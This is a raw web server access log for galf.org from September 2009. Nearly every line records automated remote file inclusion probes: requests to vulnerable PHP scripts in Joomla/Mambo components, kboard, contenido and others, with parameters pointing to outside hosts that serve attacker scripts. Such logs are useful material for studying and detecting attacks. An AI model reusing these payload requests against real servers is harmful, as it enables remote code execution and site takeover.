81.24.35.80 - - [07/Sep/2009:00:53:39 -0700] "GET /logs/access_090622.log/kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.galf.org"
61.47.7.71 - - [07/Sep/2009:00:53:51 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://saint56.pe.kr//bbs/skin/uks_vote_v3021/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
219.85.63.226 - - [07/Sep/2009:00:53:55 -0700] "GET /include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:00:53:55 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:00:53:55 -0700] "GET /logs/access_090216.log%20%20//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:00:53:58 -0700] "GET /include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:00:53:58 -0700] "GET /logs/access_090216.log%20%20//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:00:53:58 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:00:54:06 -0700] "GET /logs/access_090518.log%20%20//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:00:54:31 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:00:54:31 -0700] "GET /include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:00:54:31 -0700] "GET /logs/access_090216.log%20%20//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:00:54:39 -0700] "GET /logs/access_090518.log%20%20//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:00:54:42 -0700] "GET /logs/access_090518.log%20%20//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
151.8.79.19 - - [07/Sep/2009:00:54:46 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
151.8.79.19 - - [07/Sep/2009:00:54:49 -0700] "GET /logs/access_090216.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
151.8.79.19 - - [07/Sep/2009:00:54:49 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
151.8.79.19 - - [07/Sep/2009:00:54:54 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
151.8.79.19 - - [07/Sep/2009:00:54:54 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
151.8.79.19 - - [07/Sep/2009:00:54:54 -0700] "GET /logs/access_090216.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:00:55:14 -0700] "GET /logs/access_090518.log%20%20//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.6.22.91 - - [07/Sep/2009:00:55:14 -0700] "GET /logs/access_090202.log HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
151.8.79.19 - - [07/Sep/2009:00:55:15 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
151.8.79.19 - - [07/Sep/2009:00:55:15 -0700] "GET /logs/access_090323.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
151.8.79.19 - - [07/Sep/2009:00:55:15 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
151.8.79.19 - - [07/Sep/2009:00:57:43 -0700] "GET /logs/access_090601.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
151.8.79.19 - - [07/Sep/2009:00:58:05 -0700] "GET /logs/access_090601.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.24.35.80 - - [07/Sep/2009:00:59:48 -0700] "GET /logs/access_090316.log/kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:01:01:12 -0700] "GET /include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:01:01:12 -0700] "GET /logs/access_090518.log//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:01:01:12 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:01:01:14 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:01:01:14 -0700] "GET /include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:01:01:14 -0700] "GET /logs/access_090518.log%20%20//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:01:01:19 -0700] "GET /logs/access_090511.log//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:01:01:20 -0700] "GET /logs/access_090511.log%20%20//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:01:01:22 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:01:01:22 -0700] "GET /include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:01:01:22 -0700] "GET /logs/access_090518.log%20%20//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:01:01:30 -0700] "GET /include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:01:01:30 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:01:01:30 -0700] "GET /logs/access_090518.log%20%20//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:01:01:34 -0700] "GET /logs/access_090511.log%20%20//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:01:01:38 -0700] "GET /logs/access_090518.log//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:01:01:38 -0700] "GET /include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:01:01:38 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:01:01:39 -0700] "GET /include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:01:01:39 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:01:01:39 -0700] "GET /logs/access_090518.log%20%20//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:01:01:40 -0700] "GET /logs/access_090511.log%20%20//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:01:01:45 -0700] "GET /logs/access_090511.log//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:01:01:46 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:01:01:46 -0700] "GET /include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:01:01:46 -0700] "GET /logs/access_090518.log//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:01:01:47 -0700] "GET /logs/access_090511.log%20%20//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:01:01:56 -0700] "GET /logs/access_090511.log//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:01:02:09 -0700] "GET /include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:01:02:09 -0700] "GET /logs/access_090518.log//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:01:02:09 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:01:02:21 -0700] "GET /logs/access_090511.log//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [07/Sep/2009:01:05:31 -0700] "GET /logs/access_090720.log%20%20//?path%5Bdocroot%5D=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [07/Sep/2009:01:05:31 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [07/Sep/2009:01:05:31 -0700] "GET /?path%5Bdocroot%5D=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [07/Sep/2009:01:05:44 -0700] "GET /logs/access_090525.log%20%20//?path%5Bdocroot%5D=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [07/Sep/2009:01:05:59 -0700] "GET /?path%5Bdocroot%5D=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [07/Sep/2009:01:05:59 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [07/Sep/2009:01:05:59 -0700] "GET /logs/access_090720.log%20%20//?path%5Bdocroot%5D=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.24.35.80 - - [07/Sep/2009:01:06:10 -0700] "GET /logs/access.log/kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.galf.org"
81.24.35.80 - - [07/Sep/2009:01:06:10 -0700] "GET /logs/access_090209.log/kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.galf.org"
65.38.188.164 - - [07/Sep/2009:01:06:13 -0700] "GET /logs/access_090525.log%20%20//?path%5Bdocroot%5D=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [07/Sep/2009:01:10:21 -0700] "GET /logs/access_090629.log%20%20/errors.php?error=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [07/Sep/2009:01:10:21 -0700] "GET /errors.php?error=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [07/Sep/2009:01:10:21 -0700] "GET /logs/errors.php?error=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [07/Sep/2009:01:10:24 -0700] "GET /errors.php?error=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [07/Sep/2009:01:10:24 -0700] "GET /logs/access_090629.log%20%20/errors.php?error=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [07/Sep/2009:01:10:24 -0700] "GET /logs/errors.php?error=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
151.8.79.19 - - [07/Sep/2009:01:14:52 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
151.8.79.19 - - [07/Sep/2009:01:14:52 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
151.8.79.19 - - [07/Sep/2009:01:14:52 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
62.141.56.136 - - [07/Sep/2009:01:18:41 -0700] "GET /logs/access_090720.log/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.141.56.136 - - [07/Sep/2009:01:18:41 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.141.56.136 - - [07/Sep/2009:01:18:41 -0700] "GET /logs/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.141.56.136 - - [07/Sep/2009:01:18:58 -0700] "GET /logs/access_090622.log/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
211.43.202.66 - - [07/Sep/2009:01:19:24 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "galf.org"
211.43.202.66 - - [07/Sep/2009:01:19:24 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "galf.org"
211.43.202.66 - - [07/Sep/2009:01:25:36 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.galf.org"
211.43.202.66 - - [07/Sep/2009:01:25:36 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.galf.org"
211.43.202.66 - - [07/Sep/2009:01:34:11 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
211.43.202.66 - - [07/Sep/2009:01:34:11 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
218.38.136.251 - - [07/Sep/2009:01:36:01 -0700] "GET /logs/access_090316.log/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
218.38.136.251 - - [07/Sep/2009:01:36:02 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
218.38.136.251 - - [07/Sep/2009:01:36:02 -0700] "GET /logs/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
218.38.136.251 - - [07/Sep/2009:01:40:21 -0700] "GET /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:01:42:12 -0700] "GET /include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:01:42:12 -0700] "GET /logs/access_090511.log%20%20//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:01:42:12 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.251 - - [07/Sep/2009:01:42:13 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.251 - - [07/Sep/2009:01:42:13 -0700] "GET /logs/access_090323.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.251 - - [07/Sep/2009:01:42:13 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.251 - - [07/Sep/2009:01:42:34 -0700] "GET /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:01:42:38 -0700] "GET /logs/access_090511.log%20%20//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:01:42:38 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:01:42:38 -0700] "GET /include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:01:42:47 -0700] "GET /include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:01:42:47 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:01:42:47 -0700] "GET /logs/access_090511.log%20%20//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:01:43:22 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:01:43:22 -0700] "GET /logs/access_090511.log%20%20//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:01:43:22 -0700] "GET /include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:01:43:42 -0700] "GET /include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:01:43:42 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:01:43:42 -0700] "GET /logs/access_090511.log//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.24.35.80 - - [07/Sep/2009:01:44:34 -0700] "GET /logs/access_090629.log/index.php?nic=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.galf.org"
81.24.35.80 - - [07/Sep/2009:01:44:37 -0700] "GET /index.php?nic=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.galf.org"
81.24.35.80 - - [07/Sep/2009:01:44:37 -0700] "GET /logs/index.php?nic=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.galf.org"
